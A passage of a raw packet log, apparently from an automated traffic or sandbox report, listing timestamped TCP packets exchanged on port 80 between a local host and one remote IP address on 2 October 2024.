                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956351042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956362963 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956367970 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956376076 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956392050 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956399918 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956413031 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956423998 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956424952 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956438065 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956449032 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956449986 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956461906 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956473112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956474066 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956485987 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956496954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956506014 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956509113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956520081 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956525087 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956537962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956548929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956548929 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956562042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956573963 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956584930 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.956609011 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.958827019 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994107962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994122028 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994132996 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994144917 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994174957 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994205952 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994206905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994215965 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994226933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994236946 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994241953 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:49.994282961 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.038546085 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050860882 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050879002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050889015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050899982 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050913095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050925016 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050940037 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050950050 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050951004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050961971 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.050986052 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051151037 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051187038 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051291943 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051302910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051316023 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051326990 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051335096 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051337004 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051347017 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051357031 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051358938 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051367044 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051376104 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051378012 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051394939 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051405907 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051412106 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051434994 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051707983 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051717997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051752090 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051915884 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051930904 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051942110 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051948071 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051951885 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051961899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051971912 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051971912 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051981926 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.051992893 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052000046 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052002907 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052014112 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052014112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052023888 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052033901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052038908 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052043915 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052053928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052063942 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052066088 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052073956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052083969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052087069 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052098989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052103043 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052109957 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052119017 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052143097 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052845001 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052855015 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052865028 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052875042 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052885056 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052895069 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052906036 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052910089 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052916050 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052933931 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.052958965 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053759098 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053777933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053787947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053798914 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053808928 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053809881 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053818941 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053828955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053843021 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053847075 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053853989 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053864002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053867102 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053874969 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053884983 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053894997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053898096 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053905964 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053915977 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053917885 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053926945 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053932905 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053941011 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053950071 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053961039 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053971052 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.053978920 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054011106 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054662943 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054673910 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054683924 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054702997 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054702997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054714918 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054725885 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054735899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054747105 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054747105 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054757118 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054766893 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054769993 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054778099 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054786921 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054788113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054797888 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054805040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054807901 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054822922 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054824114 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054833889 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054845095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054853916 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054855108 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054864883 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054879904 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054883003 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054891109 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054899931 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.054914951 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055536985 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055547953 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055558920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055569887 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055571079 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055583954 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055588007 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055593967 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055603981 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055614948 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055614948 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055624962 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055634022 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055651903 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.055653095 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084651947 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084681988 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084692955 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084701061 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084731102 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084791899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084803104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084815025 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084867001 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084911108 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.084949970 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.140963078 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141000032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141051054 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141063929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141083002 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141117096 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141165972 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141197920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141199112 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141208887 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141230106 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141261101 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141268969 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141294956 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141338110 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141345978 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141376972 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141410112 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141427040 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141448975 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141463995 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141491890 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141495943 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141536951 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141544104 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141577005 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141607046 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141638994 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141649008 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141701937 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141794920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141829967 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141871929 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141921997 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.141962051 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142000914 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142038107 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142045021 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142077923 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142096043 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142153978 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142190933 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142200947 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142227888 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142271996 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142275095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142340899 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142354965 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142391920 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142399073 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142429113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142463923 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142474890 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142486095 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142501116 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142504930 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142519951 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142535925 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142539978 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142550945 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142565966 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142580032 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142595053 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142604113 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142604113 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142618895 CEST8049711147.45.44.104192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142620087 CEST4971180192.168.2.6147.45.44.104
                                                                                                                                                                                                                                          Oct 2, 2024 14:42:50.142631054 CEST8049711147.45.44.104192.168.2.6
